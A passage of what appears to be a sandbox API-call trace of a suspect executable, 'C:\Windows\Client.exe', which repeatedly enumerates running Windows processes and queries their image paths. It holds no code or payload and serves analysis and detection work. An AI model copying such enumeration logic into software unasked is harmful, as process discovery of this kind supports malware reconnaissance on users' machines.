bInheritHandle=0, dwProcessId=0x41c) returned 0x170 [0290.535] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\dwm.exe", lpdwSize=0x18fd44) returned 1 [0290.538] CloseHandle (hObject=0x170) returned 1 [0290.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.555] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.556] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.557] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.558] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.559] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.560] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.561] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.561] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.562] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.563] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.564] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.565] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.566] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.567] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.568] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.569] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.570] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.570] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x32c) returned 0x178 [0290.572] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.573] CloseHandle (hObject=0x178) returned 1 [0290.573] CloseHandle (hObject=0x170) returned 1 [0290.573] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x170 [0290.573] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18faf0) returned 1 [0290.575] CloseHandle (hObject=0x170) returned 1 [0290.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0a78, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exe", lpUsedDefaultChar=0x0) returned 31 [0290.575] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x41c) returned 0x170 [0290.576] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\dwm.exe", lpdwSize=0x18fd48) returned 1 [0290.580] CloseHandle (hObject=0x170) returned 1 [0290.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\dwm.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0290.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\dwm.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0290.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\dwm.exe", cchWideChar=27, lpMultiByteStr=0x9d92a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\dwm.exee", lpUsedDefaultChar=0x0) returned 27 [0290.580] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x41c) returned 0x170 [0290.580] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\dwm.exe", lpdwSize=0x18fd40) returned 1 [0290.583] CloseHandle (hObject=0x170) returned 1 [0290.583] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x41c) returned 0x170 [0290.583] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\dwm.exe", lpdwSize=0x18fd48) returned 1 [0290.586] CloseHandle (hObject=0x170) returned 1 [0290.586] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x41c) returned 0x170 [0290.587] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\dwm.exe", lpdwSize=0x18fd48) returned 1 [0290.664] CloseHandle (hObject=0x170) returned 1 [0290.664] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x454) returned 0x170 [0290.664] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.664] CloseHandle (hObject=0x170) returned 1 [0290.664] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x454) returned 0x170 [0290.664] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.668] CloseHandle (hObject=0x170) returned 1 [0290.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.672] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.673] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.674] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.675] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.676] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.677] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.678] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.678] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.679] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.680] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.682] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.683] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.684] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.685] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.686] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.687] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.688] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.688] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.689] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.690] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.690] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.691] CloseHandle (hObject=0x178) returned 1 [0290.691] CloseHandle (hObject=0x170) returned 1 [0290.691] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.691] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.693] CloseHandle (hObject=0x170) returned 1 [0290.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0ad8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.693] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x454) returned 0x170 [0290.693] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.696] CloseHandle (hObject=0x170) returned 1 [0290.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0a78, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exe", lpUsedDefaultChar=0x0) returned 31 [0290.696] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x454) returned 0x170 [0290.697] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.738] CloseHandle (hObject=0x170) returned 1 [0290.738] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x454) returned 0x170 [0290.738] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.741] CloseHandle (hObject=0x170) returned 1 [0290.741] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x454) returned 0x170 [0290.741] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.746] CloseHandle (hObject=0x170) returned 1 [0290.746] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e8) returned 0x170 [0290.746] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.747] CloseHandle (hObject=0x170) returned 1 [0290.747] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4e8) returned 0x170 [0290.747] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\spoolsv.exe", lpdwSize=0x18fd44) returned 1 [0290.750] CloseHandle (hObject=0x170) returned 1 [0290.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.754] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.755] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.756] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.757] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.758] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.758] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.761] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.762] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.763] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.763] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.764] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.765] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.766] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.767] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.768] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.769] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, 